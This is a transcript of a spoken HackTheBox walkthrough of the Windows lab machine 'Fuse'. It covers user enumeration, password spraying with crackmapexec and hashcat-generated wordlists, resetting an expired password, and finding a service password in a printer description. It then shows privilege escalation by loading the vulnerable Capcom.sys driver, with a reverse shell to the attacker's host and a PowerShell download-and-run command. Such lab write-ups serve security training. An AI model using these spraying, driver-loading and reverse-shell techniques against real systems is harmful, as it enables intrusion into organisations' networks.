What's going on YouTube? This is Ipsec. I'm doing Fuse from HackTheBox, which was a really fun Windows box in the medium difficulty range. The whole premise of it is exploiting a corporation's automated printer install process. You see a web page of the printer and are able to enumerate a bunch of usernames that you can use to guess a password to get into the environment. The trick is, though, the password that you guess is expired, so you have to find a way to reset that expired password, and then you query the domain. You look at the installed printers of the domain and see the printer passwords actually in the description and use that to spray again to get a shell into the domain as the print service. The print service can load a driver, so it can load the printer's driver, but you can also use it to load malicious drivers. So we load the Capcom.sys exploit we used in the fighter machine and then just exploit that Capcom.sys for privesc. So with all that being said, let's just jump in. As always, I'm going to start with the nmap, so -sc for default scripts, sv, enumerate versions, oa, output all formats, put in the nmap directory and call it fuse, and then the IP address, which is 10.10.10.193. This can take some time to run, so I've already ran it. Looking at the results, we have a bunch of ports open. The first one I see is DNS on port 53, then we have HTTP on port 80, and it's telling us it's IIS version 10, and I know version 10 is probably going to be Windows 2016 or 2019. You can just go and Google IIS versions probably, and if you go to the very first one, Wikipedia, kind of has a bunch of listings, and we can see version 10 right here is 2016, and it's also 10 2019. I guess Microsoft stopped updating this as much because back here we can see 8.0 was 2012 and 8.5 is 2012 R2. So again, not sure why they didn't change from 10 to 10.5 or 11, but they didn't. So 10 can be either of those two Windows versions. It's not too important. The next port we have is KerBrute, and we get the server time, which could be important. We have a bunch of RPC ports. LDAP is running. I think this is encrypted KerBrute, more RPC, LDAP, secure. And it does leak the hostname, which is fabricorp.local. So we could either just edit a host file to include this so a machine knows where this domain is, or we can edit resolve.conf. And I'm going to opt for editing resolve.conf. That way, if there's other DNS names, it just automatically gets it. And you can do this whenever you see DNS. So I'm going to edit this, and we can do name server and put this here. The main issue you're going to have is this is going to query the domain controller whenever you go to an internet site, and it's going to probably go slow. You could put it below yours, but then I think it may go slow when you try to resolve fabricorp.local, depending how your DNS on your computer is configured. So I'm just going to accept. When I browse the internet, it's going to go slow, and we'll save this file. And there's not too much in nmap, except, again, what the BIOS host name is and whatever. But let's go take a look at the website. So I'm going to go to 10.10.10.193, and we get redirected to this web server. I see it's papercut print logger. So the very first thing I'm going to do is a search exploit on papercut, and we get nothing. We could go and Google around, but before I go and Google around, I'm just going to click and explore this web application. I also see the copyright is 2012, which indicates probably going to be good for a CVE. And then we could also go to the website and see if there is a changelog or other things. But looking at these links, it's all going to HTML files. So I don't know if there's actually going to be anything juicy to attack, because this looks like it just generates a bunch of static sites. And if we don't have user input, then we can't really do much attacking. We could try for open directories. So go to /HTML, we just see this. We could go to /logs, we get access denied, but it doesn't really look that great. I was hoping that it would be papercut index.html ? View and then a date, 2020 10/30, I think today's date is, or something. If it was like this and we're passing it a parameter to the site, we have a parameter to attack. But this is just going to a blank page, so nothing too good there. Clicking on the actual print logs, let's see, we got, this is 30 May, 29. Let's get 10 June. We have a few host names, or not host names, but usernames, and potentially clients, like Laptop 7, Lawn Workstation 19, Jump 01. So some good information there, but the main thing I want is usernames. So I'm going to grab these usernames. So let's do v users and start pasting these there. Go to the next one. This one's S Thompson. And then we got B Holt and administrator. And let's see if these users are valid on the domain. And to do that, I'm going to use a program called KerBrute. And if you go to ipsec.rocks, we've done it already once before. My internet's going to go slow because I edited my resolve.host, so we'll just resume that later. But I'm going to do locate KerBrute to see where else I have this installed. I'm just going to copy it off of Blackfield, and we'll copy it to this directory. If you don't have KerBrute, you can just go to GitHub and install it. If you want to see other things, again, just go to ipsec.rocks, type your query, and you'll get links to what you want to do. So KerBrute-H to get help. And we're going to want to do the user enum. And let's see, probably the domain string, fabricorp.local. And we can just do this because we pointed our DNS to the server, so this resolves. And then we need the username file. So we'll just call, what do we call it? Users? And we run, and everything looks like it is valid. So one of the things I also like doing is I like putting in a user I don't think exists. So like, please subscribe, because the server could be configured in a way for some reason that just says everyone's valid. So you need to put a like known negative in, so you know, yes, indeed, if it wasn't a valid username, you wouldn't have got it. So we see tested 6 users, 5 valid. Please subscribe doesn't exist, so we know our username list is correct. So the next piece we need is to get a password out of this. So we could try just crackmap.exec blindly with a bunch of passwords, but it's always a tough idea to go blind with guessing passwords. Maybe like password 1 exclamation point. If you have a lot of users, that could be good, or password 2020. But for a HackTheBox machine, probably not going to be that. Doesn't mean you shouldn't try it, but I'm not going to waste your time. So there are 2 ways we can go about it. First, we're going to go about it what I think is the lame way. And the lame way is, let's do it through cool. So we can do 10, 10, 10, 193. And I call this the lame way just because like so many places cover it. And I don't really, whenever I do engagements, it doesn't really benefit me that much. But I like showing it because it works in this scenario. So cool, we'll do the depth of 7. This is how many pages deep it's going to go. Probably the max would be 2 or 3, but I just like giving it a large depth. The minimum word length, -m, I'm going to do 8 because most passwords require 8 characters. -w for out file, cool.out. And then we can put the initial page we want to crawl here. And now it's going to download everything. It should, I hope, stay here and not go and click this link and crawl papercut.com. I'm not positive about that one. Like I said, I don't use cool that often. So with this list, now we can do a CME, crackmap.exec, SMB 10.10.10 193-U, users-p, cool.out. And now it's going to try to brute force all the passwords. And we'll get a bunch of login failures. Eventually, we'll see some success. But the way I like going about this is using a custom word list. So I'm going to do v custom, I guess. I'm going to put 2 things. I'm always going to begin with a capital letter because, let's be honest, most passwords will begin with a capital letter that are default just because of password policy things. Like, password policy is almost always going to require a capital letter, so people put it at the beginning because it's natural. So the domain name, winter, summer, and you can go on with a bunch of other ones. And Wait, did this not get the password? Wow. pmerton, tlevel. I don't know. Oh. There's one flag we probably missed. In order for cool to grab words with numbers in it, you have to specify, I think, let's do cool-h. What is the flag? -- with numbers. So we'll do -- with numbers. And then when that finishes, we'll just run crack map. But again, get a few things, get a few words you think it may be. I'm sure you can be creative and go larger than this. But once you have these 3 words, then I would recommend doing Hashcat. So you can do Hashcat -- force if you don't have a GPU. Never use this to actually crack, but for generating a password, it's fine, or a password list, it's fine. So the word list, and we have FabriCorp1 here for his password. But the word list is going to be custom, and we're going to specify the rule file. So user share hashcat rules, and I'm going to do best64, and then -- std out, and we'll direct it to hashcat words. So we can cat custom. We have these 3 things, but if we less hashcat words, it's done all the work for us of generating a nice word list. So we know, based upon this, FabriCorp01 was the password. So we can search this and see if we actually got it. So we can search FabriCorp01, and yes, the Hashcat thing would have got it. But it just does a bunch of good ones, and if you want to, you can go and create your custom rule to do things that this wouldn't do, like maybe add an exclamation point to the end of the word. So if we wanted to do that, it's pretty simple. We just go over to Google and Google like Hashcat rules, and probably have to give this some time to bring the page back because, again, internet's slow because of how I did DNS. But we can do vi append exclamation .rule. And then all we do is $, and then exclamation point, and that's going to put exclamation at the end of every word. So if we go back to our hashcat command, I'm going to get rid of this base64 rule. We're just going to do append exclamation. We still need std out. And we can see it appended an exclamation point to everything. The downside with this just happened was it didn't do nothing, which means we just append an exclamation point to everything, but we still don't have the original word. So when you do this custom rule, I would recommend also having a colon, and that is the do nothing rule in Hashcat. And you can see now it's kind of how we expected it. Let's see. Ooh. Hashcat rule. Okay, there we go. The very first one. So this page is going to have explanations of how these rules work. But what we would also probably do is double rule this. So we'll do -r user share hashcat rules best64. And then we can, I'm just going to write that to temp. But if we do a wc-l on temp, and a wc-l on what we call the last one, hashcat words, you can see temp is now double the size of the last one, but it's just the last one, and then everything also has an exclamation appended to it. And I chose exclamation because, let's be honest, that is the most common character a password is going to end with. So this would be the superior word list to use when you do this type of operation. Whenever you do brute forcing, you should always be careful to make sure you're not locking accounts out, because if you start locking everyone out because of failed password attempts, you're gonna have a bad day. But looks like we have it good. And let's do, out of curiosity, ls wc-l on cool.out. So that's only 45 words. Our custom one that we did was 231. So cool definitely had less words, but you'd argue that probably the Hashcat words would work in more scenarios, because having the domain name 01 on a web page that you happen to call is not too likely. This is a very contrived scenario where that works. So you notice that crackmap exec stopped on password must change. If we wanted to, we could probably tell crackmap exec to continue. What is continue? Dash continue on success. So that's probably what we'd want to do. So we see everything, but let's go see if we can play with this password must change. So I'm going to grab this, and while that goes, we can go down here, the creds, paste the cred, and then just cat it. And now we can try to use RPCClient to change the password. So -u t level and then 10.10.10.193. And we want to put his password, which is just FabriCorp01. And we put this in, and we can't even log in because NT status password must change. We could try like a null authentication, and it looks like it lets us in. And then we can try changing his password with what is it? I think it's set user info 2 t level 23. Please subscribe exclamation point. And we get no user session key, so we can't change it because we're not logged in. We could try like dumping users with EnumDomUsers, but access denied. So RPCClient is a bust. There is another tool that can set passwords, and it's called SMBPasswd. So let's try this, t level, and then -r for the realm, and we can do FabriCorp.local. And then his old password, FabriCorp01, please subscribe, exclamation point, please subscribe, exclamation point. If I typed it correctly both times, will it work? And if I type the domain name correct, will it work? FabriCorp.local. I think I did not. Oh. If you want to go to the Hashcat rule file, this is it. So it's just very simple, like do nothing. This lowercase is all letters. If we wanted to put something at the beginning, it's caret, then what we want to put. I just said append character, so $, then the character. So you can read all this and play with it if you want. If you don't know what I did with set user info, we could also Google like RPC password, and I explain it better in this video. But host unreachable. What was the domain name? That's why I went back to my password. FabriCorp.local? What? Maybe I need fuse.fabricorp.local. If we ping this, it doesn't go. I wonder if we do sudo vi etc resolve.conf, and we do search and then put the domain name, which is fabricorp.local. Is that going to work now? Nope. If we do fuse, I'm not sure why that's not working. We're going to just ignore that, and we'll put an IP address for the realm, 10.10.10.193. The old password was FabriCorp01. Please subscribe. I just typoed that. FabriCorp01. Please you know what? Please subscribe, exclamation point. Sometimes I really hate not being able to see what I'm typing. FabriCorp01, paste. And the password has been changed for this user. So now if we did crackmap exec on, was it t level, and then the password of this, we get in, but it doesn't say pwned. So we could try the other way that you commonly get a shell, which is WinRM, and see if we can do WinRM to get in. And I don't think he can. We'll let that go. We could look back up here, and we have a few of these that password must be changed, like bhalt. tlavel. Yeah, a few of them that must, but we try this again and it says access denied. Let's go back to SMB and we get login failure. So I guess there's something on this box that is resetting the password, or there's someone else on the box doing it at the same time. So I'm going to do fabricorp01, paste it. Make sure I pasted what I thought. Ooh, I did not. So let's copy this. Fabricorp01, paste. The password indicate some password. Let's see. Fabricorp01, paste, add exclamation point. So it may have some type of like password memory. And the default on Windows is remember the last 24 passwords and don't let you set it to the same thing twice. So that's why I just added an exclamation point. So let's go back to the WinRM and we'll try it with 2 exclamations. And at the same time, let's do RPCClient -U tlavel 10.10.10.193. Log in. And man, I think this is going to be annoying. I think the thing resets the password every single minute. So we have to be quick. So let's do fabricorp01, paste, run. Fabricorp01, paste. Okay, change his password. Do that, and RPCClient to log in. So that WinRM's taking its time, but we actually got in this way. So now we can do EnumDomUsers since we have an active session to Active Directory and get all the usernames. So let's get everyone that we're missing because there are more users than here. I mean, I think we had 5 before. Now it looks like we have like 9 or something. So VI users 2. Did I not copy? Clipboards always sometimes behave wonky. So we can cat users 2. And then I'm going to do awk-F print 1. Print 2, and then we're going to do another awk on the other side of the bracket. And there's a better way to do this, but whenever I try awk with multiple field separators, especially these brackets, I just have trouble. So that's why I separate into 2, and we direct that to the users file. So now we have just a list of every user on the box. So we could probably get rid of that default account and KerBrute because those are never going to be valid. But we could now, if we wanted to, rerun a crackmap exec and see if we get anything else. So let that run. There is a service account. So generally service accounts, I like seeing how they're configured. So you're going to do query user 0x450. And we can see pretty much nothing about it. It is a print account, and then this is also a printer. So I'm going to do enum printers, I think, to query SMB for the printer information, and we get a password, it looks like. So this is the description for the printer, and it says it's near the IT area. The scan to docs password is Fabry service or something. So let's go back and do another crackmap exec. So CME SMB 10.10.10.193-U users and -P. Put this password in. So let's run this and see what we get. Right off the bat, we have SVC-PRINT has that password. It doesn't say owned, so just like last time, let us try WinRM to see if we get anything different over WinRM. and we get a shell. So we can probably do evil WinRM. I think it's -I for IP. -I 10.10.10 193-U SVC-PRINT and -P. We'll put the password in. Copy, paste. And if this didn't work, I'd probably go back to Hashcat to try a bunch of variations, like adding an exclamation point to the end, removing one, a bunch of things like that. But we get a shell on this box. Generally, the very first thing I do when I get a shell is do a whoami/all, just to see like what groups I'm a member of, what tokens I have, because if I see like SE impersonate, I know I'd go to like rogue potato or juicy potato, but generally like just running that command. So let's see, the groups we're in, everyone, print operators, users, pre-Windows 2000, remote management users. So this is why we can do WinRM. Network, authenticated users, this organization, IT accounts, NTLM, and high mandatory. Let's look at the privileges we have. We can add workstations to the domain. We can load or unload device drivers. And this is super dangerous because we can just put something in the kernel essentially. Shut down, change notify, and increase working set privilege. We're going to hone in on this SeLoadDriverPrivilege, and the reason why this account probably has it is so it can load the printer driver. But we can load malicious drivers, and since they operate in the kernel, we can do really bad things. So one of the most common drivers that people load would be like the Capcom.sys because it's easily exploitable. But there's a bunch of other drivers you can find, but we'll do Capcom. And if you want this exploit explained a bit better, I recommend watching the fighter video because I think we'll go through it more in depth. But we're just going to load Capcom.sys onto this machine and then exploit it pretty quickly. So let's do that. In order to do that though, we need to get on a Windows machine with Visual Studio. So here we are on a Windows machine. I just installed the Commando VM, which if you don't know how to do, you can just go to ipsec.rocks and type that in. But we're going to Google SeLoadDriverPrivilege, and the very first post is abusing it. And if we go to this post, it'll explain everything we need to do. So I'm just going to scroll to the relevant part, which is this file. And this is going to load the driver for us. The next thing we need is a utility to exploit Capcom.sys. So I'm going to Google, well, before we even exploit Capcom.sys, we need to download it. So I'm just going to go to FuzzySecurity and type Capcom.sys because this is the blog post that had most of the information about exploiting it in that fighter video. And we're at Capcom rootkit drivers Capcom.sys. We can download this file, keep it, and we're going to show the files in our downloads and hope I don't have anything sensitive here. Everything looks fine, thank God. Create a new folder, and we're going to call this Fuse, and we're going to start putting things into this. So first, we want that. The next thing is we want to grab this tarlogic thing. I'm just going to git clone it. So cmd, go into downloads, Fuse, and then git clone, paste, and we have that. The last thing we need is the actual utility to exploit Capcom.sys. So I'm going to go back to the web browser and we're going to Google ExploitCapcom GitHub and go to the first one. So we got another GitHub repo. So we can just go and git clone this as well. And we just have to compile these. So let's go open up a folder, and let's go to this EoPLoadDriver load. And does this have compile instructions? Let's see. Open. I have no clue why that wants to open like that. That looks bad. Let's see. does not have compile instructions. So we're just going to create a new Visual Studio project and wing it. So Visual Studio, it is a C++ file. So we can open this, edit, and let's see, is there a main here? There is a main. So I'm just going to copy this whole thing. Let's do, let's see. Create new project. And then empty project. Let's see, I'll do a console app. And this will be load driver. Create. And now we're here. So I'm just going to go into the C++ file, and then we're going to paste what we had from the other one. And I'm going to change this to release 64-bit. And we're going to hope this builds. Rebuilding, cannot open that. Not exactly sure why it's erroring. I think that's just a pre-compile header, so I probably messed up when I was creating the project, but I think we can remove that safely. So now if I rebuild this solution without that, let's see if it builds. We got an exe, so if we just have it not work on us, we know we'll probably have to go back and revisit that, but I think it'll work. So I'm just going to go into this directory, and we're going to copy the load driver exe out of it. So we were in downloads. So let's just go back here and paste that. And the next thing we have to compile is ExploitCapcom. And let's see if they have a project file. They do. So let's do file, open, project solution. And we'll go to C:users, IPsec, downloads, fuse, ExploitCapcom. Whoops. Load this. And this looks better. So let's just go to release, rebuild solution. And I think ExploitCapcom is going to ask us to execute a binary. So I think we do like /exploitCapcom and then the tool we want to run, which I think we're going to try a PowerShell script. If that doesn't work, we'll create like a C++ or .NET Reverse shell. So we have this tool now. Let's go back to the folder, ExploitCapcom, x64, release, and we'll copy this here. And do we have Python on this? Python 3. It's opening Windows Store. Python. We do have Python 3 as just the Python. So let's quit this. Control Z. There we go. IP config 135 is this computer's IP. So python -m http.server. And we'll go to 135. So let's go to Parrot and make dir dub cd dub. Actually, we don't need to go there. We can just download everything. So wget 1010, nope, 172.16.10.135, port 8000, and load driver.exe, I think. Ooh, connection refused. 135. Do I have a firewall up? I can't imagine that. Can we ping my box? Let's see. Ping 172.16.10.135. We can. We can check the firewall. Firewall. Let's see. Off, off, off. So there's no firewall. Let's see. Control C out of that. Oh God. There we go. Let's do 172.16.10.135:8000. Is that how we specify? So it wants -- bind. There we go. So now we just told the server to bind to that address. So wget, there we go. We actually connected to it, but it doesn't look to be working. Oh, I hit enter and looks like it worked. Let's see. The next one was, I think, ExploitCapcom and Capcom.sys. So ExploitCapcom.exe and Capcom.sys. So now we've downloaded everything. We can exit this RPC. And we can go to cd/temp. Is this a directory? cd/Windows temp. Is this a directory? It is. So we can upload Capcom.sys and upload LoadDriver.exe. Upload ExploitCapcom.exe. And we'll probably want to make dir www now. Go into it, and we need to do a Nashang reverse shell. So cp user share Nashang shells invoke reverse invoke. Let's see, PowerShell TCP.ps1 to rev.ps1. And let's go to the reverse example. I like just deleting this line, putting it at the bottom. And we can say the IP address is 10.10.14.3, which is my Parrot box. And the port is going to be 9001. So we can save that. And let's just upload this actually to the machine. So I'll copy that out of my www directory, so we can just do upload rev.ps1. There we go. So let's look at how we load the driver. Let's go, I guess, back to commando, because we had the post up here. Oh god, zoomed in too far. Load driver.exe. So registry key driver path. So system current control set my service, and then capcom.sys. So system current control set is what we want. So let's do load driver.exe, system current control set. Please subscribe, Windows temp. I hope we put everything in temp. Capcom.sys. See if it uploads. We probably have to do // loading driver. I think that's good. When error 0. So I'm guessing there is no error message. I'm hoping that's what it means. I think we can do like get Windows driver -all. Maybe. Get Windows driver. Is this a command? Please subscribe. Is that what we called it? -online -all. Requires elevation. We're going to assume it's installed. So the next thing we want to do is exploit Capcom. I think we just called it like this, .exe, and Windows temp rev.ps1. And system shell was launched. Looks like it loaded it, but it doesn't look like we got our PowerShell. We could try PowerShell like this. Does this work? PowerShell IX. IWR-URL 10.10.14.3 9001 test. I'm just seeing if this would have hit our web server. I'm going to test this command. Is it URI? Not L? Okay, it's URI. So now we have a PowerShell command we know will be able to hit a web server. So we can just test if this exe will work with PowerShell. Oh, come on. There we go. So here, URI. And it's not hitting this thing. So we probably want to create a exe. So let's go back to commando, and we'll do C++ reverse shell, Windows. Is this it? First.c server. I don't want a server. Let's just do .NET Reverse Shell. There we go. This seems to be good. So we can go back to... Oh, we can probably just compile this with CSC on this box. So I'm going to close out of this. vrev dot, what's .NET's extension? What extension are you? I honestly don't know what .NET's extension normally is. We'll just call it .c, I guess. I don't think extension matters. So we can upload rev.c. If I typed it right. And I just realized I did not put the IP address in this. So that would have been bad. So 10.10.14.3. We'll do port 9001. There we go. And we'll delete rev.c. And then upload rev.c. And I just remember the extension for .NET. It is CS. So if we have an issue, we'll do CS. Let's see. So we want to go to C:\Windows Microsoft.NET Framework 64 CD v4 and I think csc.exe is here. So /csc.exe/t C:\Windows temp rev.exe. No, T is target. So T will be exe, and then out is the name. So this will be C:\Windows temp rev.exe, and then the file, which is C:\Windows temp rev.c. Could not be found. Let's see. cd/Windows temp. Let's move rev.c to rev.cs. Upload rev.cs. Going to copy this directory. /csc.exe. And we'll redo this. Rev.cs. dr C:\Windows temp. I wonder if it doesn't like this file being in temp. Type rev.cs. File definitely exists. Let's see. delete all of this. File definitely exists. Let's just do dir and slash. There is a readme. Type /readme.txt. Let's see. Test directory has been created. Diagnosing issues. The folder should be used. Maybe we can just put that in this folder. So copy rev.cs to /this. And go back up to this. Rev.cs. /. Pause a part of this. It's got a warning, but I think we got rev.exe existing. We can /rev.exe to make sure it works. And lvnp. And we get a reverse shell. So we know a reverse shell works. It's a bit slow. I don't know why it's going slow. And okay, this is fine. Let's do this ExploitCapcom thing again. Go all the way up, and this will be rev.exe. Run this. We don't get a shell. Windows temp. Maybe it wants the full path. Nope. Let's copy rev.exe out of temp. What is this? So we'll copy it into that directory that we can write to. It's going to be really weird if it just doesn't like where we have it. /exploit capcom.exe. Copy this. Rev.exe. So I think we're going to have to modify maybe this exploitcapcom.exe to launch out of argv. I don't think it's doing that. We just see system shell was launched. So going back over to our commando VM, let's go into ExploitCapcom and look at the source. So source files, exploitcapcom.c++, and I'm going to search for system shell. And we see right here, there's this function launch shell. If it returns false, we say create process failed. So we're not getting create process failed, so it is working. Let's just see what the code around launch shell is. And it looks like it's hard-coded just to do cmd.exe. Let's see. Is it pulling? Command line, null pointer. Doesn't look like it's doing any arguments with this. So let's just do temp rev.exe. And we'll recompile it. And before we do, system shell, we're going to do Windows temp rev.exe. And the reason why I'm modifying this is just so I know we're running the latest code. Because if I see system shell was launched, I know we didn't copy capcom.syst or exploit capcom over top of what we needed to. So always like changing the output of something just slightly so we know we're doing the right thing. So users, ipsec, fuse, exploit capcom, and we will copy this over top. And do we still have our web server running? We do. So we can wget, let's /exploit capcom. There we go. Move .1 over exe. Like that. run this again, and we can upload ExploitCapcom.exe. And it's uploading. Now let's just execute it. And we get a reverse shell. Awesome. So that was the issue. Probably should review code before we run it. We would have definitely caught that if we looked at exactly what the tool was doing. But for some reason, I thought this accepted an argument. So we can do dir, who am I? And we are n-tier 30 system. So we could go users desktop, cd users administrator desktop, and get root.txt if we wanted to. So hope you enjoyed the video. Take care, and I will see you all next week.